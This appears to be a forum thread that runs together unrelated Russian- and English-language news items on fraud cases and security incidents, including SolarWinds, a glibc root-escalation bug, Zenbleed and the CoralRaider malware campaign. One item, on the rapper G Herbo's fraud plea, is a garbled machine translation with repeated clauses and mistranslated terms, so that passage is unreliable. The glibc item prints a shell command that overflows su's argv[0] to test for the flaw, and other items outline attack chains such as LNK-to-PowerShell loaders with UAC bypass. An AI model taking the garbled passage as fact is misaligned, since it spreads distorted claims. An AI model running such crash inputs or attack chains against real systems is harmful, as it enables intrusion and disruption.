С заявлением о хищении денег в милицию обратился житель Гродно. Выяснилось, что молодому человеку позвонили якобы из службы безопасности банка. Собеседник пояснил, что неизвестные оформили на имя мужчины кредит. Для того, чтобы отменить операцию, необходимо было взять пять новых кредитов в разных банках, а деньги перевести на новый счет.
Для убедительности мошенники даже прибегли к новым уловкам. Мужчине тут же поступил новый звонок. На этот раз собеседники представились сотрудниками милиции. Они подтвердили, что мужчине необходимо действовать в соответствии с рекомендациями сотрудника банка. В итоге на счет мошенников было переведено около Br59 тыс.
Представители компании Autodesk [уведомили](https://www.documentcloud.org/documents/21053749-autodesk- targeted-by-russian-svr-in-solawinds-supply-chain- attacl-10-q-sec#document/p96/a2052810) американскую Комиссию по ценным бумагам и биржам о том, что тоже пострадали во время крупномасштабной атаки на цепочку поставок и взлома компании SolarWinds. Оказалось, что один из серверов компании был заражен малварью Sunburst.
«Мы выявили скомпрометированный сервер SolarWinds и незамедлительно предприняли шаги для локализации и устранения угрозы. Хотя мы полагаем, что клиентские операции и продукты Autodesk не пострадали в результате этой атаки, другие подобные атаки могут оказать значительное негативное влияние на наши системы и операции», — гласит официальный отчет компании.
Click to expand...
Представитель Autodesk сообщил изданию Bleeping Computer, что злоумышленники не развертывали на серверах компании никакой малвари, кроме бэкдора Sunburst. Вероятно, в случае Autodesk злоумышленники решили не развивать атаку или не смогли действовать все достаточно быстро, прежде чем были обнаружены.
«Autodesk обнаружила скомпрометированный сервер SolarWinds 13 декабря 2020 года. Вскоре после этого сервер был изолирован, логи собраны для криминалистического анализа, и было применено исправление. Группа безопасности Autodesk завершила расследование и не обнаружила никаких вредоносных действий, кроме начальной установки [вредоносного] программного обеспечения», — заявляют в компании.
Click to expand...
Напомню, что взлом SolarWinds стал одной из наиболее масштабных атак на цепочку поставок в истории. В декабре 2020 года стало известно, что неизвестные злоумышленники атаковали компанию и заразили ее платформу Orion малварью.
Согласно официальным данным, среди 300 000 клиентов SolarWinds только 33 000 использовали Orion, а в начале года сообщалось, что зараженная версия платформы была установлена примерно у 18 000 клиентов. В результате этого инцидента пострадали такие гиганты, как Microsoft, Cisco, FireEye, а также множество правительственных агентств США, включая Госдеп, Министерство юстиции и Национальное управление по ядерной безопасности.
Американские власти [официально возложили](https://xakep.ru/2021/04/16/pt- sanctioned/) ответственность за эту атаку на Россию. Администрация Джо Байдена заявила, что за атакой стояла Служба внешней разведки России и ее «правительственные хакеры», известные как APT 29, Cozy Bear, Nobelium или The Dukes. По данным властей, они «использовали платформу SolarWinds Orion и другие ИТ-инфраструктуры в рамках широкомасштабной кибершпионской кампании».
A fake Walmart press release stating that the retail chain would begin accepting Litecoin caused the cryptocurrency to jump by almost 35% this morning.
The fake Walmart press release was released this morning at 9:30 AM and included made-up quotes from Walmart's CEO Doug McMillon and Litecoin creator Charlie Lee about the partnership. "The momentum and excitement around the use of cryptocurrency are undeniable, and we are poised to make online shopping easy for our customers. As a leading eCommerce store, we are committed to bringing innovations to the online shopping experience. By integrating Litecoin, we will enable shoppers to experience a very smooth checkout experience with near instant transaction confirmation, and near-zero fees regardless of where in the world they are," claimed the fake quote from Doug McMillon, Walmart's CEO.
As the press release was published on GlobeNewswire, other partners, including Yahoo, syndicated it, giving it much wider attention.
As the news quickly spread on Twitter and major publishers, such as the now- withdrawn story from [Reuters](https://www.reuters.com/business/retail- consumer/walmart-accept-litecoin-payments-2021-09-13/), the price of Litecoin spiked almost 35%, from $175 to $237.
After users spotted that the email address for the media contact used wal- mart.com, a domain registered last month on Namecheap and not linked to Walmart, it quickly became apparent that it was an elaborate hoax.
Soon after, CNBC [reported](https://www.cnbc.com/2021/09/13/walmart-to-accept- payments-with-cryptocurrencies-using-litecoin.html) that Walmart confirmed that the press release was fake.
This caused the price of Litecoin to plummet back to close its original value, with it now trading at ~$178.
Источник: https://www.bleepingcomputer[.]com/...ase-hoax-causes-litecoin-to- spike-34-percent/
Собранные следствием ММО МВД России «Ковылкинский» доказательства оказались достаточными для вынесения приговора в отношении 26-летнего жителя Новосибирской области, признанного виновным в совершении преступления, предусмотренного ч. 4 ст. 159 УК РФ «Мошенничество», и 27-летнего жителя Свердловской области, признанного виновным в совершении преступления, предусмотренного ч. 3 ст. 30, ч. 4 ст. 159 УК РФ «Мошенничество».
Преступная деятельность указанных лиц была пресечена в ходе оперативно- розыскных мероприятий сотрудниками уголовного розыска ММО МВД России «Ковылкинский».
В рамках предварительного расследования установлено, осужденные нашли в чатах сети Интернет информацию о возможности дополнительного заработка дистанционным путем. Связавшись с неизвестными посредством мессенджера, они согласились за определённую плату подыскивать граждан, готовых предоставить свои банковские карты, якобы под предлогом осуществления легальной деятельности в сфере заработка на криптовалюте. Информацию о номерах и PIN-кодах фигуранты предоставляли под контроль неизвестных им кураторов.
Как выяснилось, осужденные были вовлечены в криминальную схему, которая основывалась на получении руководителями организованной преступной группы, уголовное дело в отношении которых выделено в отдельное производство, от граждан обманным путем денежных средств. Так, в результате преступных действий фигурантов пострадали двое жителей Ковылкинского района. Один из которых перевел на предоставленный мошенниками счет в качестве предоплаты 38 800 рублей за покупку обрезных досок. Ложную информацию о продаже товара потерпевший нашел на сайте бесплатных объявлений. Второй пострадавший, будучи уверенным, что действует в личных интересах, поверил неизвестным, взял кредит на сумму 1,5 млн рублей и перевел несколькими платежами на указанные банковские карты.
Все денежные средства поступали на привязанные к платежным картам счета и обналичивались мошенниками.
Вину в содеянном жители Новосибирской и Свердловской областей признали полностью.
Приговором суда по совокупности преступлений один из фигурантов осужден к 2 годам 3 месяцам лишения свободы, второй приговорен к 4 годам 4 месяцам лишения свободы. Отбывать наказание указанные лица будут в колонии общего режима.
Компания Qualys [выявила](https://www.openwall.com/lists/oss- security/2024/01/30/6) опасную уязвимость ([CVE-2023-6246](https://security- tracker.debian.org/tracker/CVE-2023-6246)) в стандартной Си-библиотеке Glibc, позволяющую через манипуляции с запуском SUID-приложений добиться выполнения своего кода с повышенными привилегиями. Исследователи смогли разработать рабочий эксплоит, позволяющий получить права root через манипуляцию с аргументами командной строки при запуске утилиты su.
Уязвимость вызвана переполнением буфера в функций __vsyslog_internal(), используемой при вызове функций syslog() и vsyslog(). Проблема возникает из-за ошибки при попытке вывода через макрос SYSLOG_HEADER слишком длинного имени приложения. При попытке расширения буфера с учётом длинного имени возникает сбой, после которого данные записываются в старый буфер изначального меньшего размера.
При организации атаки через утилиту su атакующий может изменить имя процесса при запуске приложения через замену значения argv[0], которое используется для получения информации об имени программы при выводе в лог, и добиться контролируемой перезаписи данных за пределами выделенного буфера. Далее переполнение можно использовать для перезаписи структуры nss_module в библиотеке nss для создания разделяемой библиотеки и её загрузки с правами root.
Проблема проявляется начиная с выпуска glibc 2.37, опубликованного в августе 2022 года и включающего изменение, обрабатывающее ситуацию с попыткой записи слишком больших сообщений. Вносящее уязвимость исправление было бэкпортировано в ветку glibc 2.36 и пакеты дистрибутивов с более старыми версиями glibc, так как отмеченное исправление устраняло уязвимость CVE-2022-39046, приводящую к утечке данных из кучи. Получилось так, что исправление неопасной уязвимости привело к появлению критической проблемы. Примечательно, что о похожей уязвимости в функции vsyslog() из состава библиотеки libc 5.4.3 сообщалось ещё в 1997 году.
Наличие уязвимости подтверждено в Debian 12/13, Ubuntu 23.04/23.10 и Fedora 37-39. Работа эксплоита для получения непривилегированным пользователем прав root продемонстрирована в полностью обновлённом окружении Fedora 38 со всеми включёнными в конфигурации по умолчанию механизмами защиты. Уязвимость может быть эксплуатирована только локально, так как требует передачи более 1024 байт через параметр argv[0] или аргумент ident в функции openlog().
Исправление уязвимости включено несколько часов назад в кодовую базу Glibc и войдёт в состав завтрашнего обновления Glibc 2.39, наряду с исправлением ещё двух уязвимостей ([CVE-2023-6779](https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC- SA-2024-0002;hb=HEAD), [CVE-2023-6780](https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC- SA-2024-0003;hb=HEAD)) , также затрагивающих код __vsyslog_internal() и приводящих к переполнению буфера. Более того, компания Qualys предупредила о выявлении переполнения буфера в реализации функции qsort(), которое не было отнесено разработчиками Glibc к числу уязвимостей, так как эксплуатация подразумевает использование в качестве аргумента при вызове qsort нетипичной функции сравнения, возвращающей разницу сравниваемых параметров.
Протестировать подверженность системы уязвимости можно следующей командой:
Code:Copy to clipboard
$ (exec -a "`printf '%0128000x' 1`" /usr/bin/su < /dev/null)
Чикагский рэпер G Herbo признал себя виновным в мошенничестве с украденными кредитками на сумму до 1,5 миллиона долларов: он и его подельники использовали их для оплаты частных самолетов и ямайской виллы.
Несмотря на то, что подобные преступления предусматривают лишение свободы до 20 лет, скорее всего, G Herbo получит от двух до трех лет за решеткой.
Слушание по делу о признании вины предварительно назначено на 27 июля. На днях
рэпер также предстал перед судом Массачусетса по обвинению в хранении оружия.
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Чикагская рэп -сенсация G Herbo сталкивается с годами за решеткой после того,
как согласился признать себя виновным в Массачусетсе по обвинению в
федеральном мошенничестве с проволокой, обвинениями, которые обвиняли его в
использовании украденных личностей для финансирования частных самолетов,
ямайской виллы и «дизайнерских щенков», а затем лгать об этом федеральным
агентам.
Прокуроры в окружном суде США в Спрингфилде, штат Массачусетс, в среду, в среду, в среду, в тот же день Хербо, в среду, в тот же день, в тот же день, в тот же день, в тот же день, в тот же день, когда Хербо, в тот же день по обвинению в оружии в Чикаго, в среду было предложено соглашение о признании вины, изложенное условия сделки, в тот же день, когда Хербо, чье настоящее имя Герберт Райт III.
Потенциальная просьба, которая по -прежнему должна быть одобрена судьей, наступает более чем через 2 с половиной года после того, как Tribune впервые сообщила, что Райт был обвинен по обвинению в заговоре с целью совершения мошенничества с проволокой и кражи личности при отягчающих обстоятельствах. Обвинение за ложью агентов было добавлено в отдельном обвинительном заключении в 2021 году.
Подсчет мошенничества с проволоками имеет до 20 лет тюрьмы, но в соответствии с федеральными руководящими принципами приговора Райт, вероятно, столкнется срок в диапазоне от двух до трех лет. Эти детали все еще разрабатываются.
Слушание о признании вины было предварительно назначено на 27 июля перед окружным судьей США Марком Г. Мастроянни.
Адвокат Райта не смог немедленно добраться за комментарий.
27 -летний Райт, который родом из района Южной Сайд, некоторые из них называли «Terror Town», был обвинен вместе с пятью партнерами, в том числе Promotor Antonio Strong, в использовании похищенных личностей, чтобы принести до 1,5 миллиона долларов в виде мошеннических обвинений за товары и услуги, в том числе частные дневные поездки, личный шеф, каникул в ямайской вилле и Puppies in Chispigan.
Райт яростно отрицал правонарушения в то время, когда ему было предъявлено обвинение, даже бросил новую песню и видео в конце 2020 года, которое издевалось над федеральным расследованием и рекламировал его рост с проблемных улиц Южной Сайд, чтобы получить международное признание.
«Спросите обо мне, я никогда не был мошенничеством»,-сказал он в двухминутном видео под названием «Заявление», выпущенное в социальных сетях. «Я много работал с самого начала, в моем городе, я Бог (ругательство)».
Обвинения утверждали, что Райт солгал федеральному агенту в ноябре 2018 года о его отношениях с Стронгом, Чикагским рэп -промоутером и предполагаемым вдохновителем схемы кражи личности.
В частности, Райт ложно сказал, что он никогда не предоставил сильных денег, никогда не получал ничего ценного от сильного и не имел прямых отношений с сильным. Фактически, по крайней мере, с 2016 года, Райт получил ценные товары от Strong, в том числе частные чартеры, роскошные жилья и экзотическую аренду автомобилей, утверждают обвинения.
Райт и Стронг также частые контакты друг с другом, включая телефонные разговоры, текстовые сообщения и сообщения в Instagram, были указаны.
Соглашение о признании вины содержало многочисленные текстовые сообщения между Райтом и Стронгом, в том числе одно, в котором Райт назвал Чикаго «« Рэк », и якобы попросил сильного« утонченного »его гостиничного номера, что означает его с помощью мошеннических средств.
«Я в Рак. Посмотрите, не сможете ли вы получить мне сумму на сегодняшний день, как сегодня, когда я уйду на свое шоу сегодня вечером », - сообщает Wright 30 июля 2016 года. Райт написал Стронг. «Обосновать мне комнату или сумма, чувак, возьмите с собой кроватку, пока мы здесь или суммируйте, братан».
В 2017 году Стронг и Райт якобы сговорились о покупке двух щенков Йоркширского терьера у бизнеса под названием Woof Woof Puppies в Мичигане, согласно заявлению. Сильный, используя название «Даррен Гейгер» и идентифицируя себя в качестве менеджера Райта, приказал собакам для Райта, используя украденную кредитную карту.
Согласно Согласно соглашению, Pet Company, казалось, была подозрительной и попросила Райта подтвердить заказ, общая его непосредственно с его аккаунта в Instagram. Стронг якобы отправил текст Райту, говоря: «Спешите просто сообщить, что (ругательство) привет».
В обвинительном заключении утверждалось, что Райт сделал то, что ему сказали. Представитель Компании сообщил Райту в Instagram, спрашивая: «Вы правильно понимаете 2 щенка?» Затем Райт подтвердил заказ, согласно обвинениям.
Щенки были доставлены, но сделка, по -видимому, испортилась после того, как платеж был отменен из -за подозреваемого мошенничества.
Согласно соглашению о признании вины, 6 декабря 2017 года Райт отправил сильное текстовое сообщение, касающееся мошенничества с гауфами, сказав: «Я уже изявил этих собак для вас и не давал (ругательство) ... вы продали хотя бы одно, что вы делали с хлебом, не моя проблема».
Два месяца спустя, один из владельцев гадалов, угрожал Райту в чате прямого сообщения, заявив, что они пойдут в полицию, если он не решит его, согласно документу о признании вины.
«У нас есть вы на фотографии, свидетели, номерной знак. Это уголовное преступление », - написал владелец Woof Woof, согласно заявлению.
Райт якобы ответил: «Разве вы не видите фотографии на моей странице ??? Это похоже на меня на этой картинке ?? Я никогда не встречал тебя ».
Владелец Woof Woof ответил, что Райт встретился непосредственно со своей страницы в Instagram, когда они были по телефону, и «телефонный звонок был записан».
«Все это идет в местную полицию», - сказал владелец. «Они будут расследовать. Вы сообщения со своей официальной страницы в Instagram показывают, что вы получили 2 щенка. Что ты собираешься сказать ?? Это не ты??"
Райт никогда не отвечал дальше, и собаки никогда не платили, согласно заявлению.
source:
chicagotribune.com/news/criminal-justice/ct-g-herbo-chicago-rapper-pleads-
guilty-federal-fraud-charges-20230719-o33a2tgmrvbr5cqwu7vg2m4r7q-story.html
justice[.]gov/usao-ma/pr/chicago-area-rapper-charged-making-false-statements-
federal-agent
Группа хакеров смогла получить контроль над старым спутником и использовать его для потоковой передачи выступлений с хакерских конференций и показа хакерских фильмов.
13 августа на конференции DEF CON в Лас-Вегасе участник группы по взлому телекоммуникаций и встроенных устройств Shadytel Карл Кошер объяснил, как он вместе со своими коллегами смогли легально вести стриминг со спутника на геостационарной орбите — 35 786 км от поверхности планеты.
Специалисты смогли получить доступ к неиспользуемому объекту восходящей связи — небольшому сараю с оборудованием для подключения к спутнику, — что позволило им транслировать сигналы на выведенный из эксплуатации в 2020 году канадский спутник Anik F1R. Поскольку у специалистов был доступ к этому каналу связи, команда Кошера использовала только программно-определяемый радиоприемник Hack RF стоимостью около $350.
У Кошера также есть лицензия на использование восходящей линии связи и арендованный спутниковый ретранслятор, открывающий канал между приемной и передающей антеннами. Они использовали эту возможность для потоковой передачи докладов хакерской конференции ToorCon в Сан-Диего 2021 года, а ночью они транслировали фильмы про хакеров.
Поскольку у них была дополнительная пропускная способность, они могли не только вести потоковую передачу, но и иметь канал, привязанный к мосту телефонной связи. Кошер сказал, что у специалистов был специальный номер, по которому вы могли позвонить и просто транслировать свой голос в Северную Америку и за ее пределы.
Выступление Кошера показало другим хакерам, что они могут управлять спутником
независимо от наличия доступа к восходящей линии связи, поскольку в сети нет
даже системы аутентификации.
По словам Кошера, помимо трюка с потоковой передачей из космоса, их
исследование помогло понять, как работает спутниковая передача. Кошер заявил,
что спутники просто отражают любой отправленный им сигнал. При передаче
сигнала на транспондер спутник просто повторит этот сигнал. Однако, если на
транспондере есть другой пользователь, вы должны звучать «громче», чтобы
спутник уловил именно ваш сигнал.
source:
shady.tel
shawbroadcast.com/Documents/2020/jan/22/EOL%20ANIK%20F1R.pdf
greatscottgadgets.com/hackrf/one
Новый вредонос атаковавших SolarWinds хакеров годами оставался незамеченным
Преступники вооружились вариантом GoldMax для Linux и новым имплантатом, получившим название TrailBlazer.
Злоумышленники, ответственные за компрометацию цепочки поставок SolarWinds , продолжают расширять свой арсенал вредоносных программ за счет инструментов и методов, которые применялись в атаках еще в 2019 году.
Специалисты ИБ-компании CrowdStrike подробно описали новую тактику, принятую хакерской группировкой Nobelium. Преступники вооружились двумя сложными семействами вредоносных программ — вариантом GoldMax для Linux и новым имплантатом, получившим название TrailBlazer.
Группировка Nobelium также отслеживается специалистами в области кибербезопасности под названиями UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity) и Iron Ritual (Secureworks).
GoldMax (также известный как SUNSHUTTLE) был обнаружен Microsoft и FireEye (теперь Mandiant) в марте 2021 года и представляет собой вредоносное ПО на основе Golang. Вредонос выполняет роль бэкдора управления и контроля, устанавливая безопасное соединение с удаленным сервером для выполнения произвольных команд на взломанной системе.
Хакеры использовали вредоносное ПО в атаках как минимум с августа 2020 года (за четыре месяца до атаки на SolarWinds). В сентябре 2021 года «Лаборатория Касперского» описала второй вариант бэкдора GoldMax под названием Tomiris, использованный для атак на несколько правительственных организаций в неназванном государстве СНГ в декабре 2020 года и январе 2021 года.
Последняя итерация представляет собой ранее недокументированную, но функционально идентичную реализацию вредоносного ПО второго уровня для Linux, которое было установлено в средах жертв в середине 2019 года.
Примерно в то же время был использован модельный бэкдор TrailBlazer, который имеет общие черты с GoldMax в том, как он маскирует трафик командного сервера под легитимные HTTP-запросы Google Notifications.
Участники группировки осуществили несколько краж учетных данных домена с интервалом в несколько месяцев, каждый раз используя разные методы. Одним из методов было использование похитителя паролей Mimikatz в памяти с уже скомпрометированной системы для обеспечения доступа в течение длительных периодов времени.
Легендарный процессор Intel 8086 появился в далёком 1978 году. По современным
меркам это невероятно примитивное решение с 29 000 транзисторов и частотой до
16 МГц. Однако оказалось, что и в столь старом CPU в 2023 году можно найти
кое-что новое. К примеру, секретные инструкции.
Исследователь аппаратного обеспечения Кен Ширриф (Ken Shirriff) решил изучить
упомянутый процессор и нашёл там немало любопытного. Например, этот CPU не
содержит никакого запрета на запуск неподдерживаемых инструкций. То есть при
получении таких инструкций CPU всё равно пытался их выполнить.
В целом Intel 8086 поддерживал 521 инструкцию, хранящуюся в микросхеме ПЗУ
Microcode. Некоторые из этих 512 инструкций были продублированы в качестве
резервных копий, а некоторые вообще никогда не были обнародованы самой Intel.
Наибольший интерес вызывает одна из таких инструкций. Она была создана для
защиты интеллектуальной собственности Intel. Если бы какая-то компания решила
незаконно скопировать процессор Intel 8086, она бы скопировала и эту
особенность CPU, не зная о её существовании. В итоге CPU-клон выполнял бы
определённую операцию SALC (Set AL to Carry) при подаче соответствующих битов
машинного кода. Это позволило бы Intel более эффективно преследовать любых
недобросовестных конкурентов.
Что интересно, через несколько лет после выхода Intel 8086 у компании
появилась возможность опробовать свою ловушку в действии, так как компания
посчитала, что NEC в своём процессоре V20 реализовала именно копию Intel
8086/8088, но суд вынес решение в пользу NEC.
Надсмотрщица из тюрьмы округа Ориндж (штат Калифорния) Роксана Лауб на протяжении нескольких лет жила на широкую ноу, тратя значительные суммы на ужины в респектабельных заведениях и выпивку в голливудских барах. Как выяснилось, эти деньги она воровала у собственной 75-летней бабушки.
Следователи установили, что с 2015 по 2017 год 33-летняя женщина подделала подпись своей бабушки более чем на 20 чеках, чтобы перевести около 45 тысяч долларов с ее счета на свой собственный. Кроме того, она много раз звонила в банк и пыталась выдать себя за 75-летнюю родственницу, чтобы получить сведения о ее аккаунте.
С марта 2020 года по сентябрь 2022-го Лауб также использовала кредитную карту бабушки, чтобы снимать тысячи долларов на личные расходы. Суммарно речь может идти о 14 тысячах долларов. При этом пенсионерка ничего о происходящем не знала.
«Я знаю, что то, что я сделала, непростительно», — написала Лауб одному из своих родственников, согласившись возместить причиненный ущерб.
Несмотря на это, 33-летней женщине грозит до 45 лет заключения по обвинениям в банковском мошенничестве и краже личных данных. Слушание по ее приговору запланировано на апрель 2025 года.
justice[.]gov/usao-cdca/pr/orange-county-sheriffs-department-employee-pleads- guilty-fraudulently-using-her
Cisco Talos[сообщают](https://blog.talosintelligence.com/coralraider- targets-socialmedia-accounts/) об обнаружении нового финансово мотивированного злоумышленникаCoralRaider, который действует как минимум с мая 2023 года, преследуя жертв вИндии, КНР, Южной Корее, Бангладеш, Пакистане, Индонезии и Вьетнаме.
Группа занимается кражей учетных и финансовых данных, рекламных и бизнес- аккаунтов в соцсетях с использованием вредосного ПО:RotBot и стиллераXClient.
В числе других полезных нагрузок, используемых группой, представлена комбинация троянов удаленного доступа и похитителей информации:AsyncRAT, NetSupport RAT и Rhadamanthys.
Актор использует технику тупика, злоупотребляя законным сервисом для размещения файла конфигурации C2 и необычных двоичных файловLoLBins, включая Windows Forfiles.exe и FoDHelper.exe.
Анализ показал, что злоумышленник использует Telegram-бота в качестве C2 для кражи данных жертвы с компьютеров жертв, которые затем реализуются в даркнете и специализированных группах вTelegram.
Цепочки атак начинаются с файла ярлыкаWindows (LNK), хотя на данный момент нет четкого объяснения того, как эти файлы распространяются по целям.
Если файл LNK открыт, файл HTML-приложения (HTA) загружается и выполняется с сервера загрузки, контролируемого злоумышленником, который, в свою очередь, запускает встроенный сценарийVisual Basic.
Скрипт расшифровывает и последовательно выполняет три других PowerShell- скрипта, которые отвечают за выполнение проверок, обходWindows (UAC), отключение уведомлений и приложений, а также загрузку и запуск**RotBot.
RotBot — это вариант клиентаQuasar RAT,** который злоумышленник настроил и скомпилировал для этой кампании.
Он настроен на связь с ботомTelegram, доставкуXClient и выполнение его в памяти, что в конечном итоге обеспечивает кражу cookie, кред и финансовой информации из браузеровBrave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox и Opera, а также данных**Discord и Telegram.
XClient также способен извлекать подробную информацию о способах оплаты из учетных записей жертв вFacebook, Instagram, TikTok и YouTube,** в том числе связанных с бизнес и рекламными аккаунтами.
Основываясь на аналитике поTelegram, языковых предпочтениях и замеченных IP (вХаное), исследователиCisco Talos с высокой степенью уверенности полагают, чтоCoralRaider базируются воВьетнаме.
Дополнительные технические подробности цепочки атак вскрытой кампании можно также найти в [отчете](https://www-secrss- com.translate.goog/articles/63847?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp)QiAnXin Threat Intelligence Center.
Следователями следственной части Следственного управления УМВД России по г. Челябинску окончено расследование многоэпизодного уголовного дела о мошенничестве, возбужденного по части 2 статьи 159 УК РФ в отношении 19-летнего местного жителя.
По версии следствия, обвиняемый, ранее судимый за совершение аналогичных преступлений, предлагал своим знакомым оформить кредитные карты в одном из банков для дальнейшего инвестирования полученных средств на онлайн-сервисе обмена цифровых валют и получения прибыли. Потерпевшие оформляли кредитные карты, после чего перечисляли деньги на указанные им расчетные счета. В подтверждение правдивости своих слов злоумышленник отсылал скриншоты с финансовой платформы с указанием полученной текущей прибыли. В действительности же отчетность была недостоверной – ее молодой человек изготавливал с помощью графического редактора. Никакой деятельности на электронной платформе фигурант не вел и финансовых операций не совершал. Денежные средства он тратил на собственные развлечения, не планируя возвращать их потерпевшим. С целью получения большей прибыли злоумышленник предлагал своим «инвесторам» вовлекать в данную схему их знакомых и друзей.
По истечении времени, не дождавшись ни процентов, ни возврата вложенных денежных средств, обманутые граждане обращались в полицию. Противоправная деятельность злоумышленника пресечена оперативниками оперативно-сыскного отдела уголовного розыска городского Управления МВД России. Следователи установили 49 эпизодов его преступной деятельности. Общий ущерб, причиненный потерпевшим жителям Челябинской и Свердловской областей, составил свыше 2 миллионов рублей.
Материалы уголовного дела с утвержденным прокурором обвинительным заключением направлены в Калининский районный суд города Челябинска для рассмотрения по существу.
Bank of America отказался возвращать украденные у жителя страны деньги, которые были сняты другим человеком в банкомате. При этом, как пишет ABC 7, финансовая организация прислала жертве скрины записи, на которой виден преступник, и заявила, что он сам им и является.
После того, как со счета Кайла Фишера (Kyle Fischer) сняли деньги (точная сумма не называется), он был относительно спокоен: направил в банк запрос и ждал положительного разрешения вопроса и возмещения средств. Однако вместо этого он получил отказ с формулировкой: «Мы отклоняем ваше заявление о мошенничестве, поскольку вы сами осуществили вывод средств». Сотрудники поддержки также предложили Фишеру дополнительно запросить имеющиеся у них доказательства того, что мужчина сам был мошенником.
«Прошло пару недель, и они прислали мне фотографию человека, который, по версии банка, был мной. И, конечно, я не был удивлен тем, что я увидел: на фото был изображен кто-то, кто очень мало похож на меня», — вспоминает Фишер.
После этого он пошел за помощью к журналистам. Те показали распечатки снимков друзьям американца, которые также не узнали в мошеннике Фишера. Разгадка, по их мнению, заключается в том, что сотрудники банка сличали последнее и предпоследнее фото человека, который снимал средства, и оба раза это был преступник. В итоге Bank of America вернул всю сумму после огласки этой истории.
Во время обысков в жилом комплексе в центре Днепра полицейские установили 16 человек, которые под видом участия в онлайн торгах совершали мошеннические действия и завладевали средствами людей.
Деятельность группы документировали в течение сентября-октября 2023 года работники Управления уголовного розыска ГУНП в Днепропетровской области совместно со следственным отделом Днепровского районного управления полиции. 7 ноября при силовой поддержке работников полка полиции особого назначения в помещениях состоялись следственные мероприятия, в ходе которых правоохранители обнаружили 20 рабочих мест, оборудованных компьютерной техникой с доступом к Интернету и средствами связи.
На месте проведения обыска находилось 16 человек, которые могут быть причастны к совершению мошеннических действий. В ходе обысков изъято 30 ноутбуков, 18 мобильных телефонов, черновые записи, 35 SIM карточек мобильных операторов.
Сейчас продолжаются следственные мероприятия в рамках уголовного производства, открытого по ч. 2 ст. 190 Уголовного кодекса Украины (мошенничество).
Оперативное сопровождение по уголовному делу осуществляли сотрудники УЭБиПК ГУ МВД России по Алтайскому краю. Материалы дела насчитывают 179 томов
В Барнауле вынесли приговоры организатору и участникам преступной группы, которая с 2016 года занималась незаконным обналичиванием финансов. Подробности сообщили в СУ СКР по Алтайскому краю.
С мая 2016 по март 2020 года члены группы систематически совершали незаконные банковские операции по расчетам, кассовому обслуживанию и инкассации. Для этого они подыскивали юридических лиц, нуждающихся в обналичивании денежных средств.
Деньги перечислялись с одних подконтрольных преступникам счетов на другие, чтобы создать видимость реальных финансово-хозяйственных отношений, и обналичивались. За свои услуги фигуранты получали определенный процент.
Итого за четыре года члены преступной группы обналичили 844 млн рублей, получив доход в размере 87 млн рублей.
Суд признал подсудимых виновными и назначил организатору преступной группы 6 лет лишения свободы условно с выплатой штрафа в сумме 400 тысяч рублей, остальным участникам – от 2 до 5 лет лишения свободы условно со штрафом от 60 до 250 тысяч рублей.
source: altai-krai.sledcom.ru/news/item/1827075/
ИБ-эксперт компании Google Тэвис Орманди (Tavis Ormandy) выявил опасную уязвимость, затрагивающую процессоры AMD Zen 2. Проблема позволяет похищать конфиденциальные данные (включая пароли и ключи шифрования) со скоростью 30 кбит/с из ядер процессора.
Уязвимость получила идентификатор [CVE-2023-20593](https://cve.mitre.org/cgi- bin/cvename.cgi?name=CVE-2023-20593) и относится к типу use-after-free проблем. Она связана неправильной обработкой инструкции vzeroupper во время спекулятивных (или упреждающих — speculative) вычислений.
Уязвимость затрагивает все процессоры AMD, построенные на архитектуре Zen 2, включая Ryzen 3000 (Matisse), Ryzen 4000U/H (Renoir), Ryzen 5000U (Lucienne), Ryzen 7020, а также высокопроизводительные процессоры ThreadRipper 3000 и серверные Epyc (Rome). Однако фактическое влияние Zenbleed на обычных пользователей вряд ли будет велико, поскольку эксплуатация уязвимости требует локального доступа к целевой системе, а также серьезной технической подготовки.
Орманди рассказывает, что использовал фаззинг и счетчики производительности для обнаружения конкретных аппаратных событий, а затем проверял свои результаты с помощью методики, известной под названием Oracle Serialization. Этот подход помог выявить несоответствия между выполнением случайно сгенерированной программы и ее сериализованным оракулом, что в итоге привело к обнаружению CVE-2023-20593 в процессорах Zen 2.
Создав и использовав эксплоит для этой проблемы, исследователь получил возможность «сливать» конфиденциальные данные, связанные с любой системной операцией, включая операции происходящие в виртуальных машинах, изолированных песочницах, контейнерах и так далее.
«Пришлось немного потрудиться, но я нашел вариант, который позволяет “сливать” около 30 кб на каждое ядро в секунду. Это достаточно быстро, чтобы отслеживать ключи шифрования и пароли при входе пользователей в систему», — пишет Орманди.
Click to expand...
Компания AMD уже выпустила [обновленные микрокоды](https://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux- firmware.git/commit/?id=0bc3126c9cfa0b8c761483215c25382f831a7c6f) для некоторых уязвимых продуктов, однако [сообщается](https://www.amd.com/en/resources/product-security/bulletin/amd- sb-7008.html), что другие патчи придется ждать до ноября-декабря 2023 года (в том числе для Ryzen 3000 и Ryzen 4000).
Орманди рассказывает, что уведомил AMD о проблеме еще 15 мая 2023 года, а теперь [публикует PoC-эксплоит](https://github.com/google/security- research/tree/master/pocs/cpus/zenbleed) для CVE-2023-20593. Эксплоит написан для Linux, однако уязвимость не зависит от ОС и затрагивает все операционные системы, работающие на процессорах Zen 2.
Представители стран "подтвердили общую приверженность повышению коллективной устойчивости к вирусам-вымогателям".
В Вашингтоне состоялась встреча представителей 36 стран, посвященная борьбе с киберпреступностью. В рамках встречи участники обсудили меры, направленные на обмен информацией об угрозах в данной сфере и привлечение к ответственности хакеров.
В совместном заявлении, распространенном во вторник пресс-службой Белого дома, сообщается, что представители стран "подтвердили общую приверженность повышению коллективной устойчивости к вирусам-вымогателям". Власти государств намерены принять меры с целью "привлечения к ответственности хакеров", применяющих эти средства, а также лишения их "безопасных убежищ". Кроме того, участники встречи заявили об активизации обмена информацией об имеющихся угрозах.
Во встрече приняли участие представители Австралии, Австрии, Бельгии, Болгарии, Бразилии, Великобритании, Германии, Доминиканской Республики, Израиля, Индии, Ирландии, Испании, Италии, Канады, Кении, Литвы, Мексики, Нигерии, Нидерландов, Новой Зеландии, Норвегии, ОАЭ, Польши, Республики Корея, Румынии, Сингапура, Соединенных Штатов, Украины, Франции, Хорватии, Чехии, Швейцарии, Швеции, Эстонии, ЮАР и Японии. Также отдельно пригласили представителей Еврокомиссии.
